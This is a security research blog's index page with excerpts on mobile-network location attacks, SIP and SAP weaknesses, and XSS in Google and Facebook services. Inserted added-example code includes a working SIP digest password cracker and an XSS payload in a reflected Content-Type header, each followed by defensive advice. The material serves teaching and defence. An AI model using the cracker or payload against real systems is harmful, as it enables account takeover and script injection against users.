Thursday, April 3, 2014

Search and Neutralize. How to Determine Subscriber’s Location

Mobile networks can be attacked through multiple vectors. In this article, we consider an attack that reveals the cell in which a subscriber is located. We deliberately avoid more conventional units of distance, because cell size is not fixed: in cities a cell site may cover a few hundred meters, while in rural areas its range is several kilometers.

Friday, February 28, 2014

Unusual 3G/4G Security: Access to a Backhaul Network

A backhaul network is used to connect base stations (known as NodeB in 3G terminology) to a radio network controller (RNC).

Connecting base stations accounts for a significant part of a provider's total expenses, so it is reasonable to reduce the cost of building and running such networks, in particular by adopting new technologies.

Monday, February 24, 2014

A Sketch of SIP Security

The Internet is a great tool for communication. You can contact other people using e-mail, online chats, voice and video messengers. With the arrival of new cable systems and Balloon-Powered Internet, soon even the penguins of Antarctica will have access to the Internet!

But what about voice? With such wide Internet coverage, why do we still need telephone lines? We could send voice over Internet channels, and SIP (Session Initiation Protocol) addresses exactly this need. SIP has an interesting history, but first we want to highlight certain aspects of the protocol.
SIP is the most widely used signaling protocol for Voice over Internet Protocol (VoIP) services. SIP only sets up the session; the media is carried separately afterwards. It transmits the user name, domain (realm) and credentials in clear text: the password is sent either openly or, with digest authentication, as an MD5 hash that can be attacked offline once the exchange has been captured. Sometimes no authentication is used at all, and the connection is accepted purely on the basis of an IP:port combination.

Next we examine several threats that arise when using SIP and the methods used to exploit them.
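To make the "hash form" concrete, here is an added example (not code from the original post) of the SIP digest exchange and the offline dictionary attack it permits. It builds the Authorization header a user agent sends after a 401 challenge, parses such a header the way a sniffer on the path would, and recovers the password by recomputing the MD5 digest for each candidate. The user name, realm, nonce, password and wordlist are constructed sample values; the digest is the RFC 3261 / RFC 2617 MD5 variant without qop.

```python
"""Added example: SIP digest authentication and the offline attack on it.

Assumptions (constructed, not from any real deployment): user "alice",
realm "sip.example.net", nonce NONCE, password "s3cret". The digest is
the RFC 2617 MD5 scheme without qop, as used by RFC 3261 SIP.
"""
import hashlib
import re


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 digest without qop: MD5(HA1 ":" nonce ":" HA2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")   # secret part
    ha2 = md5_hex(f"{method}:{uri}")                   # public part
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def www_authenticate(realm, nonce):
    """Challenge line the server sends in its 401 Unauthorized."""
    return f'WWW-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5'


def build_authorization(username, realm, password, method, uri, nonce):
    """Authorization header the UA sends when it repeats the request."""
    resp = digest_response(username, realm, password, method, uri, nonce)
    return (f'Authorization: Digest username="{username}", realm="{realm}", '
            f'nonce="{nonce}", uri="{uri}", response="{resp}", algorithm=MD5')


_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def parse_authorization(header):
    """Extract name=value parameters from an Authorization: Digest header."""
    _, _, params = header.partition("Digest ")
    return {name: (quoted or bare) for name, quoted, bare in _PARAM.findall(params)}


def crack(header, method, wordlist):
    """Offline dictionary attack: everything but the password is in the header."""
    p = parse_authorization(header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate,
                                method, p["uri"], p["nonce"])
        if guess == p["response"]:
            return candidate
    return None


# Constructed sample exchange, as seen by a sniffer between UA and registrar.
NONCE = "3f3a0c2e1b"
CHALLENGE = www_authenticate("sip.example.net", NONCE)
REGISTER_AUTH = build_authorization("alice", "sip.example.net", "s3cret",
                                    "REGISTER", "sip:sip.example.net", NONCE)
WORDLIST = ["123456", "password", "s3cret", "letmein"]

if __name__ == "__main__":
    print(CHALLENGE)
    print(REGISTER_AUTH)
    print("recovered password:", crack(REGISTER_AUTH, "REGISTER", WORDLIST))
```

Because the nonce, realm, user name and URI all travel in clear text, the only unknown in the digest is the password, and the attacker can test candidates at MD5 speed without ever talking to the server; TLS for signaling (SIPS) or strong passwords are the practical defenses.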

Friday, January 31, 2014

True Tales About Vulnerabilities in Google Services

Story 1. The Little Content Type that Could

The vulnerability was found in Feedburner. First, I created a feed and tried to inject malicious data. No success there: the injected data simply did not show up, and only harmless links were presented. After a few more attempts I found lots of messages from PodMedic. PodMedic examines every link in a feed and, if it runs into trouble building the feed, reports the cause. The messages said the links were invalid because the content type returned was a text type.

Hmm. OK. I bet the content type is not filtered on this page. A simple script on my server (the injected Content-Type value itself is missing from the page; only the tail of the line survives):

<?php header('Content-Type: ...; charset=UTF-8'); ?>
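The bug class here is a checker that copies an attacker-controlled response header into its own HTML report. As an added example (not FeedBurner or PodMedic code), the following shows a report line built the vulnerable way next to a hardened version that validates the Content-Type against the media-type grammar and HTML-escapes whatever it prints. The report layout, function names and sample header values are constructed for illustration.

```python
"""Added example: reflecting a fetched link's Content-Type into an HTML
report, unescaped (vulnerable) and hardened.

Assumptions: report markup and sample headers are constructed; the token
grammar follows RFC 7231 section 3.1.1.1 (type "/" subtype).
"""
import html
import re

# RFC 7231 token characters; '<', '>', '(', ')', '"' and whitespace are not tokens.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_MEDIA_TYPE = re.compile(rf"^{_TOKEN}/{_TOKEN}$")


def media_type(content_type_header):
    """Return the bare type/subtype of a Content-Type value, or None if invalid."""
    main = content_type_header.split(";", 1)[0].strip()
    return main if _MEDIA_TYPE.match(main) else None


def is_text_type(content_type_header):
    """The condition the checker was complaining about: a text/* media type."""
    mt = media_type(content_type_header)
    return mt is not None and mt.lower().startswith("text/")


def report_vulnerable(link, content_type):
    """Header value dropped straight into markup: a server that sends
    'text/html<script>...' gets its script into the report page."""
    return f"<li>{link}: unsupported content type {content_type}</li>"


def report_hardened(link, content_type):
    """Validate first, escape everything, never echo an invalid header verbatim."""
    mt = media_type(content_type)
    shown = mt if mt is not None else "(invalid media type)"
    return (f"<li>{html.escape(link)}: unsupported content type "
            f"{html.escape(shown)}</li>")


# Constructed sample: what a malicious origin server might return.
SAMPLE_LINK = "http://attacker.example/episode.mp3"
SAMPLE_CT = "text/html<script>alert(document.domain)</script>; charset=UTF-8"

if __name__ == "__main__":
    print(report_vulnerable(SAMPLE_LINK, SAMPLE_CT))
    print(report_hardened(SAMPLE_LINK, SAMPLE_CT))
```

The validation step matters as much as the escaping: a report that must display the header for debugging should display only the part that parses as a media type, and escape even that, since a future template change can silently turn escaped output back into raw output.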

And here it is:

Monday, October 21, 2013

A Story about XSS on Facebook

One day, while browsing Facebook, I discovered an interesting tool: Graph API Explorer. It is designed for working with the Facebook Graph API and allows you to read or post data on Facebook, test permissions, and so on. So what can it actually do?

Monday, September 30, 2013

Inside Mobile Internet Security

The mobile Internet has truly gone global. An estimated 6.8 billion mobile subscriptions were reported worldwide at the end of 2012 [1]. That is the equivalent of 96 percent of the world's population being connected via a mobile device, and it represents a large increase over the 6.0 billion subscriptions reported just 12 months earlier [2].

As cellular networks grow, so do the number and frequency of mobile Internet connections, posing a new set of challenges for the IT security community. While many of us are familiar with the architecture of the regular Internet (twisted pair, Ethernet, TCP/IP), the architecture behind the mobile Internet is far less widely understood, leaving users exposed to attackers with only a slightly better level of knowledge.

In this post, Positive Research, the research division of Positive Technologies, demystifies the mobile Internet by explaining its general principles, takes a closer look at the GPRS Tunneling Protocol (GTP) used by the General Packet Radio Service, discusses the GPRS Roaming Exchange (GRX) network and demonstrates some practical issues that arise when attempting to secure a mobile network.

Thursday, August 8, 2013

SAP's Backdoor

SAP security research is one of my main duties at Positive Technologies. I also had to decide what to present to the participants of our PHDays III forum. So I arrived at the following research topic: how to hide a user with the SAP_ALL profile (i.e. all possible authorizations) in the system. If an attacker manages to log in and obtains the authorization to create users and assign privileges to them, the most likely next step is to create a new account with every authorization in the system. However, such a user shows up in the results of internal checks and external audits, and there is zero chance that an account with SAP_ALL authorizations will go unnoticed.